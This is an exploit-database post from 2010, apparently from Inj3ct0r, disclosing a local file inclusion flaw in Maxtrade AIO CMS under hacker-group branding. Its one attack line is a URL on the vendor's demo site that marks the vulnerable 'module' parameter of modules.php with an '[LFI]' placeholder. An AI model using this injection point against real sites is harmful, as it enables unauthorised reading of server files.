Maxtrade AIO CMS LFI Vulnerabilty

Posted on 11 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Maxtrade AIO CMS LFI Vulnerabilty</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================
Maxtrade AIO CMS LFI Vulnerabilty
=================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / \__  /'__`                   0
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/_\_&lt;_  /'___  /    /`'__          0
0       / /    /   / \__/  \_  \_   /           1
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
1                   \____/ &gt;&gt; Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ###################################               1
0                    I'm SONiC member from Inj3ct0r Team               1
1                    ###################################               0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name : Maxtrade AIO CMS-- LFI Vulnerabilty

Date : august 11 ,2010

Critical Level :VERY HIGH

vendor URL :?? http://www.softdivision.com/
#######################################################################################################


Author : ..::[ SONiC ]::.. aka ~the_pshyco~ &lt;sonicdefence[at]gmail.com&gt;

Special thanks to : Sid3^effects,r0073r (inj3ct0r.com),L0rd CruSad3r,M4n0j,MA1201,D3aD F0x,CURS3D,RJ,NISHI,BUNNY,

Greetz to :www.topsecure.net, iNj3cT0r.com, www.andhrahackers.com

#######################################################################################################
Description:

Maxtrade AIO is a CMS (Content Management System) written in PHP and used for creating and controling an website content. To be able to build your website with Maxtrade AIO you don't need any HTML knowledge or any other programming knowledge

#######################################################################################################
Xploit : LFI Vulnerabilty

DEMO URL? http://www.softdivision.com/maxtradedemo/modules.php?module=[LFI]




###############################################################################################################

# ..::[ SONiC ]::.. aka the_pshyco


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-11]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20